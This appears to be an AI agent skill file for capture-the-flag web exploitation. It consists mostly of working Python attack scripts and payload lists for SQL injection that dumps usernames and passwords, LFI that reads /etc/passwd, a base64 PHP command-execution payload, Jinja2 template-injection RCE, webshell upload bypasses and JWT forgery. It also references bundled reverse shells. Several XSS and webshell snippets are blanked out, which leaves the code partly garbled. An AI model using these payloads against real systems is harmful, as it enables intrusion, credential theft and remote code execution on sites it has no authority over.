--- name: web-exploits description: > Web vulnerability testing patterns for SQL injection, XSS, CSRF, LFI, SSTI, and file upload bypasses in CTF challenges. Trigger: When testing web applications, SQL injection, XSS, or file uploads. license: MIT metadata: author: ctf-arsenal version: "1.0" category: web-exploitation --- # Web Exploitation Patterns ## When to Use Load this skill when: - Testing web applications for vulnerabilities - Exploiting SQL injection, XSS, or CSRF - Bypassing file upload restrictions - Testing for LFI/RFI (Local/Remote File Inclusion) - Exploiting SSTI (Server-Side Template Injection) - Manipulating JWT tokens - Analyzing web traffic with Burp Suite ## SQL Injection ### Detection and Exploitation ```python import requests # Test for SQL injection payloads = [ "'", "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1' /*", "admin' --", "admin' #", "' UNION SELECT NULL--", ] for payload in payloads: response = requests.post(url, data={'username': payload, 'password': 'test'}) if "error" in response.text or "mysql" in response.text.lower(): print(f"[!] Vulnerable to: {payload}") ``` ### Union-Based SQLi ```python # Step 1: Find number of columns for i in range(1, 20): payload = f"' UNION SELECT {','.join(['NULL']*i)}--" response = requests.get(f"{url}?id={payload}") if "error" not in response.text: print(f"[+] Number of columns: {i}") break # Step 2: Extract data payloads = [ "' UNION SELECT 1,version(),3--", "' UNION SELECT 1,database(),3--", "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--", "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--", ] ``` ### Blind SQLi ```python # Time-based blind SQLi import time def time_based_sqli(url, param): """Check if parameter is vulnerable to time-based SQLi""" payload = f"' AND SLEEP(5)--" start = time.time() response = requests.get(f"{url}?{param}={payload}") elapsed = time.time() - start if elapsed >= 5: print(f"[+] Time-based SQLi confirmed on {param}") return True return False # Boolean-based blind SQLi def boolean_based_sqli(url): """Extract data character by character""" result = "" for i in range(1, 100): # Max 100 characters for c in range(32, 127): # ASCII printable payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--" response = requests.get(f"{url}?id={payload}") if "Welcome" in response.text: # Success indicator result += chr(c) print(f"[+] Found: {result}") break else: break return result ``` ## Cross-Site Scripting (XSS) ### Reflected XSS ```javascript // Basic payloads

``` ### Stored XSS ```python import requests # Test stored XSS xss_payloads = [ "", "

", " ``` ```python # Test CSRF protection import requests session = requests.Session() # Login first session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'}) # Try action without token response = session.post(url + "/delete_user", data={'id': '1'}) if response.status_code == 200: print("[!] No CSRF protection!") ``` ## Local File Inclusion (LFI) ### Path Traversal ```python # Common LFI payloads lfi_payloads = [ "../../../../../etc/passwd", "....//....//....//....//etc/passwd", "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "....\/....\/....\/....\/etc\/passwd", "/etc/passwd", "php://filter/convert.base64-encode/resource=index.php", "expect://whoami", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7", ] for payload in lfi_payloads: response = requests.get(f"{url}?page={payload}") if "root:" in response.text or "" response = requests.get(f"{url}?page={filter_chain}&cmd=whoami") ``` ## Server-Side Template Injection (SSTI) ### Detection ```python # Test payloads for common template engines ssti_tests = { 'Jinja2': "{{7*7}}", # Python (Flask) 'Twig': "{{7*7}}", # PHP 'ERB': "<%= 7*7 %>", # Ruby 'Smarty': "{7*7}", # PHP 'Velocity': "#set($x=7*7)$x", # Java } for engine, payload in ssti_tests.items(): response = requests.get(f"{url}?name={payload}") if "49" in response.text: print(f"[+] {engine} SSTI detected!") ``` ### Jinja2 Exploitation ```python # Read file payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}" # RCE (Python 2) payload = "{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.sh', 'w').write('#!/bin/bash\\nid') }}" # RCE (Python 3) payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" ``` ## File Upload Bypass ### Extension Bypass ```python # Test various extensions extensions = [ 'php', 'php3', 'php4', 'php5', 'phtml', 'pht', 'php.jpg', 'php.png', 'php;.jpg', 'php%00.jpg', # Null byte injection ] for ext in extensions: filename = f"shell.{ext}" files = {'file': (filename, "", 'application/x-php')} response = requests.post(url + "/upload", files=files) if response.status_code == 200: print(f"[+] Uploaded: {filename}") ``` ### Content-Type Bypass ```python # Try different MIME types content_types = [ 'image/jpeg', 'image/png', 'image/gif', 'application/octet-stream', ] for ctype in content_types: files = {'file': ('shell.php', "", ctype)} response = requests.post(url + "/upload", files=files) ``` ### Magic Bytes Bypass ```python # Add GIF header to bypass file type checks content = b"GIF89a" + b"" files = {'file': ('shell.php', content, 'image/gif')} response = requests.post(url + "/upload", files=files) ``` ## JWT Token Manipulation ```python import jwt import base64 # Decode JWT token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." decoded = jwt.decode(token, options={"verify_signature": False}) print(decoded) # None algorithm attack header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=') payload = base64.b64encode(b'{"user":"admin"}').strip(b'=') forged_token = header + b'.' + payload + b'.' # Weak secret bruteforce import hashlib with open('wordlists/common.txt') as f: for secret in f: secret = secret.strip() try: jwt.decode(token, secret, algorithms=['HS256']) print(f"[+] Found secret: {secret}") break except: continue ``` ## Quick Reference | Vulnerability | Detection Pattern | Exploitation | |---------------|------------------|--------------| | **SQL Injection** | `'`, `' OR 1=1--` | `' UNION SELECT ...` | | **XSS** | `` | Cookie stealing, session hijacking | | **LFI** | `../../../etc/passwd` | Read sensitive files, RCE via log poisoning | | **SSTI** | `{{7*7}}`, `${7*7}` | RCE via template engine | | **File Upload** | Upload `.php`, `.phtml` | Web shell execution | | **CSRF** | No token validation | Force user actions | | **JWT** | `alg: none`, weak secret | Privilege escalation | ## Bundled Resources ### Scripts - `scripts/csrf_grabber.py` - Extract CSRF tokens automatically - `scripts/jwt_tamper.py` - JWT token manipulation tool - `scripts/lfi_tester.py` - Automated LFI testing - `scripts/ssti_tester.py` - SSTI detection and exploitation - `scripts/upload_tester.py` - File upload bypass testing ### Payloads - `payloads/sqli_basic.txt` - Basic SQL injection payloads - `payloads/sqli_mysql.txt` - MySQL-specific payloads - `payloads/xss_reflected.txt` - XSS test vectors - `payloads/ssti_jinja2.txt` - Jinja2 SSTI payloads - `payloads/cmd_injection.txt` - Command injection patterns - `payloads/lfi.txt` - LFI/path traversal payloads - `payloads/ssrf.txt` - SSRF test URLs - `payloads/file_upload_bypass.txt` - Extension bypass techniques ### Webshells - `webshells/php_reverse.php` - PHP reverse shell - `webshells/aspx_cmd.aspx` - ASPX command shell - `webshells/jsp_cmd.jsp` - JSP command shell - `webshells/node_cmd.js` - Node.js shell ### Templates - `templates/web_requests.py` - Python requests template with session handling ### Wordlists - `wordlists/` - Common username/password lists (from SecLists) ## Keywords web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup